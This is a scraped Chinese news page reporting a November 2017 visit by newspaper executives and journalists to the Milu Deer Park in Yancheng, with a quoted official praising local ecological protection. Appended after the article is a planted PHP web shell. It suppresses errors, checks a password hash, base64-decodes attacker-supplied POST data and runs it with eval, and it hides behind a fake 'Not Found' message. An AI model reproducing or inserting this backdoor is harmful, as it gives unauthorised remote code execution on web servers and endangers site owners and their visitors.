最新要闻

首页 > 最新要闻 >

    “中国报业十九大融合传播峰会暨百名社长总编沿海湿地采风活动”—中华麋鹿园站

           2017年11月24日,出席中国报业十九大融合传播峰会的280多位社长、总编、记者走进中华麋鹿园,切身感受麋鹿和沿海滩涂风光的魅力。媒体人们纷纷拿起相机记录下这些美好画面。


           中国报业协会秘书长胡怀福说,麋鹿在盐城繁衍生息,这就是保护生态环境、践行绿色发展的生动实践,“绿水青山就是金山银山”在盐城落了地、开了花。“生态是盐城一张靓丽的城市名片。”他希望盐城把生态文明建设融入发展的全过程,进一步唱响生态文明“主旋律”,加强沿海生态防护林建设,不断加大生物多样性保护力度,守住项目环境准入“门槛”,大力发展战略性新兴产业,持续提升生态环境质量,让老百姓身边有更多的碧水蓝天,畅享绿色发展带来的幸福感。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>